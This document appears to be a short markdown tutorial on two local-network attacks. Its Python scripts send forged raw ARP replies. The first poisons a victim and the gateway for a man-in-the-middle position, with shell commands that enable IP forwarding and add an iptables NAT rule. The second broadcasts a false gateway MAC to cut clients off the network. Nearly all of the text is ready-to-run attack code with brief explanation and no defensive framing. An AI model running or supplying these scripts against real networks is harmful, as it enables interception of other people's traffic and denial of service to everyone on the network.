##ARP Spoofing Python script for arp spoofing ```py import socket import time interface = 'eth0' # interface on the listening machine mac = b'\x30\xa1\x06\x39\x7d\x25' # mac of the listening machine gateway_ip = socket.inet_aton('192.168.1.1') # ip of the gateway (router) gateway_mac = b'\xf5\x32\xd1\x3f\x61\x22' # mac of the gateway (router) victim_ip = socket.inet_aton('192.168.1.47') # ip of the machine we want to spoof victim_mac = b'\x25\x34\x73\xab\x14\x2b' # mac of the machine we want to spoof connect = socket.socket(socket.PF_PACKET,socket.SOCK_RAW,socket.htons(0x0800)) connect.bind((interface,socket.htons(0x0800))) arp_code = b'\x08\x06' htype = b'\x00\x01' ptype = b'\x08\x00' hlen = b'\x06' plen = b'\x04' operation = b'\x00\x02' protocol = htype + ptype + hlen + plen + operation eth_packet_1 = victim_mac + mac + arp_code eth_packet_2 = gateway_mac + mac + arp_code request_victim = eth_packet_1 + protocol + mac + gateway_ip + victim_mac + victim_ip request_gateway = eth_packet_2 + protocol + mac + victim_ip + gateway_mac + gateway_ip while True: connect.send(request_victim) connect.send(request_gateway) time.sleep(1) ``` Packets from victim machine will go through our machine as well as packets from gateway so we need to turn on `forwarding`. ```sh echo 1 > /proc/sys/net/ipv4/ip_forward ``` In this case changes will work without reloading but with the first reload forwarding will be changed to default state. To make permanent changes we need to modify `/etc/sysctl.conf` file. Uncomment line ``` #net.ipv4.ip_forward=1 ``` Also we need to make 1 record in `ip_tables`. ```sh iptables -A POSTROUTING -t nat -o eth0 -j MASQUERADE ``` ##ARP DOS Idea is to use gratuitous arp answer and tell all clients in the network wrong gateway mac. ```py import socket import time interface = 'eth0' random_mac = b'\x25\xd1\xa6\x5f\x36\x11' random_ip = socket.inet_aton('192.168.1.56') gateway_ip = socket.inet_aton('192.168.1.1') broadcast_mac = b'\xff\xff\xff\xff\xff\xff' connect = socket.socket(socket.PF_PACKET,socket.SOCK_RAW,socket.htons(0x0800)) connect.bind((interface,socket.htons(0x0800))) arp_code = b'\x08\x06' htype = b'\x00\x01' ptype = b'\x08\x00' hlen = b'\x06' plen = b'\x04' operation = b'\x00\x02' protocol = htype + ptype + hlen + plen + operation eth_packet = broadcast_mac + random_mac + arp_code request = eth_packet + protocol + random_mac + gateway_ip + broadcast_mac + random_ip while True: connect.send(request) time.sleep(1) ``` In this case there is no need to turn on forwarding because devices will have wrong mac address in their arp tables. Devices will not be able to send packets to proper destination.